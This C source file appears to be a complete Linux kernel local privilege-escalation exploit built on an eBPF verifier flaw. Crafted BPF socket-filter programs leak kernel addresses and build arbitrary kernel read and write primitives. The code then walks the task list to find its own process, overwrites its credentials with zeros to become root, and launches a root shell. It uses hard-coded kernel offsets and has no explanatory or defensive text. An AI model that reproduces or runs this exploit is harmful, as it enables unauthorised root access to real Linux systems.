#define _GNU_SOURCE

#include <fcntl.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/ioctl.h>

#include <unistd.h>

#include <sched.h>

#include <sys/types.h>

#include <linux/keyctl.h>

size_t user_cs, user_ss, user_rflags, user_sp;

void save_status()

{

asm volatile (

"mov user_cs, cs;"

"mov user_ss, ss;"

"mov user_sp, rsp;"

"pushf;"

"pop user_rflags;"

);

puts("\033[34m\033[1m[*] Status has been saved.\033[0m");

}

void get_root_shell(){

printf("now pid == %d\n", getpid());

system("/bin/sh");

}

void bindCore(int core)

{

cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);

CPU_SET(core, &cpu_set);

sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process bound to core \033[0m%d\n", core);

}

size_t page_offset_base;

int map_fd, expmap_fd;

#include <linux/bpf.h>

#include <stdint.h>

#include <sys/socket.h>

#include <sys/syscall.h>

#include "bpf_insn.h"

static inline int bpf(int cmd, union bpf_attr *attr)

{

return syscall(__NR_bpf, cmd, attr, sizeof(*attr));

}



#define CODE \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1), \
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0), \
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8), \
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 8, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 0x100),

#define VULREG \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1), \
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0), \
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8), \
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 2), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1), \
BPF_JMP_IMM(BPF_JLE, BPF_REG_2, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), \
BPF_ALU64_IMM(BPF_AND, BPF_REG_1, 2), \
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),

struct bpf_insn prog1[] = {

VULREG

BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),

BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110/2),

BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),

BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),

BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 8),

BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),

BPF_EXIT_INSN(),

};



#define BPF_LOG_SZ 0x20000

char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

int load_prog(struct bpf_insn prog[], int cnt){

int prog_fd;

union bpf_attr attr = {

.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,

.insns = (uint64_t) prog,

.insn_cnt = cnt,

.license = (uint64_t) "GPL",

.log_level = 2,

.log_buf = (uint64_t) bpf_log_buf,

.log_size = BPF_LOG_SZ,

};

prog_fd = bpf(BPF_PROG_LOAD, &attr);

if (prog_fd < 0) {

puts(bpf_log_buf);

perror("BPF_PROG_LOAD");

return -1;

}

return prog_fd;

}

void trigger_prog(int prog_fd){

int sockets[2];

if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)

perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)

perror("socketpair SO_ATTACH_BPF");

char s[0x1000] = { 0 };

int wl = write(sockets[0], s, 0x100);

}

static __always_inline int

bpf_map_create(unsigned int map_type, unsigned int key_size,

unsigned int value_size, unsigned int max_entries)

{

union bpf_attr attr = {

.map_type = map_type,

.key_size = key_size,

.value_size = value_size,

.max_entries = max_entries,

};

return bpf(BPF_MAP_CREATE, &attr);

}

static __always_inline int

bpf_map_get_elem(int map_fd, const void *key, void *value)

{

union bpf_attr attr = {

.map_fd = map_fd,

.key = (uint64_t)key,

.value = (uint64_t)value,

};

return bpf(BPF_MAP_LOOKUP_ELEM, &attr);

}

static __always_inline uint32_t

bpf_map_get_info_by_fd(int map_fd)

{

struct bpf_map_info info = { 0 };

union bpf_attr attr = {

.info.bpf_fd = map_fd,

.info.info_len = sizeof(info),

.info.info = (uint64_t)&info,

};

bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);

return info.btf_id;

}

static __always_inline int

bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)

{

union bpf_attr attr = {

.map_fd = map_fd,

.key = (uint64_t)key,

.value = (uint64_t)value,

.flags = flags,

};

return bpf(BPF_MAP_UPDATE_ELEM, &attr);

}

size_t ker_offset;

int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {

union bpf_attr attr = {

.map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,

.key_size = key_size,

.value_size = value_size,

.max_entries = max_entries,

.inner_map_fd = fd,

};

int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));

if (map_fd < 0) {

return -1;

}

return map_fd;

}

struct bpf_insn prog2[] = {

VULREG

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_MOV64_REG(BPF_REG_3, BPF_REG_2),

BPF_MOV64_IMM(BPF_REG_2, 0),

BPF_MOV64_IMM(BPF_REG_4, 8),

BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),

BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),

BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),

BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_1, 0),

BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),

BPF_EXIT_INSN(),

};

size_t aar(size_t addr, int aar_prog_fd){

int sockets[2];

if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)

perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)

perror("socketpair SO_ATTACH_BPF");

size_t key = 0;

size_t value[0x1000];

value[0] = 1LL;

value[1] = 0LL;

bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

size_t data[0x1000];

data[0] = addr;

data[1] = addr;

int wl = write(sockets[0], data, 0x100);

value[0] = 0x12341234LL;

bpf_map_get_elem(map_fd, &key, value);

return value[0];

}

struct bpf_insn prog3[] = {

VULREG

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_MOV64_REG(BPF_REG_3, BPF_REG_2),

BPF_MOV64_IMM(BPF_REG_2, 0),

BPF_MOV64_IMM(BPF_REG_4, 8),

BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),

BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),

BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0),

BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_3, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),

BPF_EXIT_INSN(),

};

size_t aaw(size_t addr, int aar_prog_fd, size_t val){

int sockets[2];

if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)

perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)

perror("socketpair SO_ATTACH_BPF");

size_t key = 0;

size_t value[0x1000];

value[0] = 1LL;

value[1] = 0LL;

bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

size_t data[0x1000];

data[0] = val;

data[1] = addr;

int wl = write(sockets[0], data, 0x100);

return wl < 0 ? (size_t)-1 : 0;

}

size_t init_task;

size_t comm_off, cred_off, task_off;

#include <sys/prctl.h>

void aar_aaw(int aar_prog_fd, int aaw_prog_fd){

if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){

perror("prctl set name");

}

size_t task = init_task+task_off;

size_t my_task = -1;

aar_prog_fd = load_prog(prog2, sizeof(prog2)/sizeof(prog2[0]));

while(task){

task = aar(task, aar_prog_fd);

size_t name = aar(task-task_off+comm_off, aar_prog_fd);

if(!memcmp(&name, "QianYiming", 8)){

my_task = task-task_off;

break;

}

}

printf("my_task == %p\n", (void *)my_task);

size_t my_cred = aar(my_task+cred_off, aar_prog_fd);

printf("my_cred == %p\n", (void *)my_cred);

aaw_prog_fd = load_prog(prog3, sizeof(prog3)/sizeof(prog3[0]));

for(int i = 0; i <= 0x28; i += 8){

aaw(my_cred+i, aaw_prog_fd, 0LL);

}

}



int main(){

save_status();

bindCore(0);

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);

if (map_fd < 0) perror("BPF_MAP_CREATE");

expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);

if (expmap_fd < 0) perror("BPF_MAP_CREATE");

size_t key = 0;

size_t value[0x1000];

value[0] = 1LL;

value[1] = 0LL;

bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

trigger_prog(load_prog(prog1, sizeof(prog1)/sizeof(prog1[0])));

value[0] = 0x1234;

bpf_map_get_elem(map_fd, &key, value);

printf("leak : %p\n", (void *)value[0]);

printf("map_wait_list : %p\n", (void *)value[1]);

ker_offset = value[0] - 0xffffffff82017a80;

printf("ker_offset == %p\n", (void *)ker_offset);

size_t page_base_offset = value[1] & 0xfffffffff0000000;

printf("page_base_offset == %p\n", (void *)page_base_offset);

init_task = ker_offset + 0xffffffff82412840;

comm_off = 0x648;

cred_off = 0x630;

task_off = 0x390;

if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){

perror("prctl set name");

}

int r = load_prog(prog2, sizeof(prog2)/sizeof(prog2[0]));

size_t my_task = -1;

size_t task = init_task + task_off;

for(int i = 0; i < 100; i++){

task = aar(task, r);

size_t name = aar(task-task_off+comm_off, r);

if(!memcmp(&name, "QianYiming", 8)){

my_task = task - task_off;

break;

}

}

size_t my_cred = aar(my_task + cred_off, r);

printf("my_cred == %p\n", (void *)my_cred);

int w = load_prog(prog3, sizeof(prog3)/sizeof(prog3[0]));

for(int i = 0; i <= 0x28; i += 8){

aaw(my_cred + i, w, 0LL);

}

system("/bin/sh");

return 0;

}
